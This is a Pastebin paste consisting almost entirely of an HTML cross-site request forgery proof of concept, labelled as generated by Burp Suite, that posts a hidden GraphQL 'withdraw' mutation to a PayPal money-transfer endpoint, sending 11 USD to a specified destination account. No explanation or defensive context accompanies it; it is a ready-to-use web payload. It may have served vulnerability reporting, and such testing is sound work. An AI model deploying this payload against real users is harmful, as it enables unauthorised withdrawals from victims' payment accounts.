Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <!-- CSRF PoC - generated by Burp Suite Professional -->
- <body>
- <script>history.pushState('', '', '/')</script>
- <form action="https://www.paypal.com/moneytransfer/graphql" method="POST">
- <input type="hidden" name="query" value="mutation{ withdraw(input: {method:ORIGINAL_CREDIT,amount:"11",currency:"USD",destinationId:"BA-Z9XZNTVAQQMAE"}){ transactionId amount { currency currencySymbol amount value raw formattedAmount formattedSymbolicISOCurrency formattedISOCurrency formattedCurrency } netAmount { currency currencySymbol amount value raw formattedAmount formattedSymbolicISOCurrency formattedISOCurrency formattedCurrency } fees { currency currencySymbol amount value raw formattedAmount formattedSymbolicISOCurrency formattedISOCurrency formattedCurrency } currencyConversion { amountFrom { currency currencySymbol amount value raw formattedAmount formattedSymbolicISOCurrency formattedISOCurrency formattedCurrency } amountTo { currency currencySymbol amount value raw formattedAmount formattedSymbolicISOCurrency formattedISOCurrency formattedCurrency } exchangeRate } status holdReason holdPeriod purposeCode error { source name issue message details { field value issue description location } debugId links { href } informationLink } } }" />
- <input type="submit" value="Submit request" />
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement